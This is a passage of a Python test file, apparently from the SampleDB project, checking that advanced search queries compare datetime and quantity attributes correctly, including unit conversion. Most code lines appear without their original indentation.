filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 on 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 on 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_datetime_less_than(user, action) -> None:
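    """< compares datetime attributes and date literals, with the attribute on either side."""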
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr < 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 < 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 < 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr < 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 < datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 < datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_datetime_before(user, action) -> None:
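    """before behaves like < for datetime attributes and date literals."""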
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr before 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 before 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 before 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr before 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 before datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 before datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_datetime_greater_than(user, action) -> None:
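    """> compares datetime attributes and date literals, with the attribute on either side."""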
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr > 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 > 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 > 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr > 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 > datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 > datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_datetime_after(user, action) -> None:
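    """after behaves like > for datetime attributes and date literals."""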
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr after 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 after 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 after 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr after 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 after datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 after datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_datetime_less_than_or_equal(user, action) -> None:
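    """<= compares datetime attributes and date literals, including the equal case."""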
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr <= 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 <= 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 <= 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 <= 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr <= 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 <= datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-06 <= datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_datetime_greater_than_or_equal(user, action) -> None:
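    """>= compares datetime attributes and date literals, including the equal case."""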
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'datetime_attr': {
'_type': 'datetime',
'utc_datetime': '2018-10-05 12:00:00'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr >= 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 >= 2018-10-06', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 >= 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 >= 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('datetime_attr >= 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 >= datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['datetime_attr']['utc_datetime'] == '2018-10-05 12:00:00'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-04 >= datetime_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_quantity_attribute_equal(user, action) -> None:
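    """== compares a quantity attribute against quantity literals, converting between compatible units."""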
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr == 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr == 0.00001km', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr == 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm == quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm == quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0


def test_find_by_quantity_attribute_not_equal(user, action) -> None:
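    """!= compares a quantity attribute against quantity literals, including literals with incompatible units."""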
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr != 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr != 0.00001km', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr != 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm != quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm != quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2kg != quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0


def test_find_by_quantity_less_than(user, action) -> None:
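    """< compares quantity attributes and quantity literals, with the attribute on either side."""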
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr < 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm < 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm < 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr < 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('0.5cm < quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm < quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_quantity_greater_than(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr > 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm > 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm > 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr > 0.5cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm > quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm > quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_quantity_less_than_equals(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr <= 0.5cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr <= 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm <= 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm <= 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr <= 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('0.5cm <= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm <= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm <= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1 <= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_quantity_greater_than_equals(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr >= 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr >= 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm >= 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm >= 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr >= 0.5cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm >= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
